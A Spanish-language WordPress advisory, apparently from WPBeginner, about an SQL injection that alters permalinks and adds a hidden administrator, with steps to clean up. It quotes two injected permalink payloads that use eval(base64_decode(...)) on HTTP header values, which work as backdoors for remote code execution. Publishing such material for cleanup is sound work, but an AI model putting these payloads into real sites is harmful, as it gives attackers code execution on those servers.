Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
Copa WPB
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

Inyección SQL en WordPress – Último ataque

Muchos sitios están siendo afectados por un reciente ataque SQL en el que se inyectan códigos en su sitio. Esta inyección MySQL afecta a sus permalinks haciéndolos ineficaces. Como resultado, las URLs de las entradas de tu blog no funcionarán. Numerosos blogs de WordPress fueron blanco de este ataque, Gracias a Andy Soward por llamar nuestra atención sobre esto.

Uno de los siguientes códigos fue añadido a su estructura de enlaces permanentes debido a este ataque:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Estas citas / presupuestos adjunta todos los enlaces permanentes en su sitio y solo se puede cambiar si se quita / elimina manualmente.

Para corregir esto vaya a:

Ajustes > Enlaces permanentes y quitar el código anterior y reemplazar su código por defecto.

Lo siguiente que tienes que hacer es ir a Usuarios. Verás que hay más de un administrador. Usted no verá su nombre en la lista, pero verá el recuento aumentado. Así que lo que tienes que hacer es mirar a todos los usuarios y encontrar el último que se registró. Pasa el ratón por encima de ese usuario y obtén el enlace. Cambia el código userid= añadiendo 1 a ese número. Así que si el último usuario que puedes ver fue el usuario #2 entonces añade 1 a él y hazlo 3. Verás que el administrador oculto tiene un código raro como nombre de pila. Borra el código y conviértelo en suscriptor. Luego vuelve y borralo.

Esto debería corregir el problema. También puedes borrarlo simplemente yendo a tu PHPMyAdmin. Porque allí verá al usuario.

Sólo queríamos dar a conocer esta noticia lo antes posible, para que nuestros usuarios puedan estar actualizados. Por favor, asegúrese de comprobar que su blog no está infectado. Esperamos que WordPress saque una versión pronto.

Además, si aún no has implementado algunas de estas medidas para asegurar tu área de administrador de WordPress.

Descargo: Nuestro contenido está apoyado por los lectores. Esto significa que si hace clic en algunos de nuestros enlaces, podemos ganar una comisión. Vea cómo se financia WPBeginner , por qué es importante, y cómo puede apoyarnos. Aquí está nuestro proceso editorial .

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

El último kit de herramientas de WordPress

Obtenga acceso GRATUITO a nuestro kit de herramientas - una colección de productos y recursos relacionados con WordPress que todo profesional debería tener!

Reader Interactions

9 comentariosDeja una respuesta

  1. Syed Balkhi

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  3. a wordpress user

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff

      Perhaps its not WordPress fault, maybe your hosting security is just not as good…

      Administrador

    • Joey

      What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.

    • Editorial Staff

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Administrador

      • lerrkin

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Deja tu comentario

Gracias por elegir dejar un comentario. Tenga en cuenta que todos los comentarios son moderados de acuerdo con nuestros política de comentarios, y su dirección de correo electrónico NO será publicada. Por favor, NO utilice palabras clave en el campo de nombre. Tengamos una conversación personal y significativa.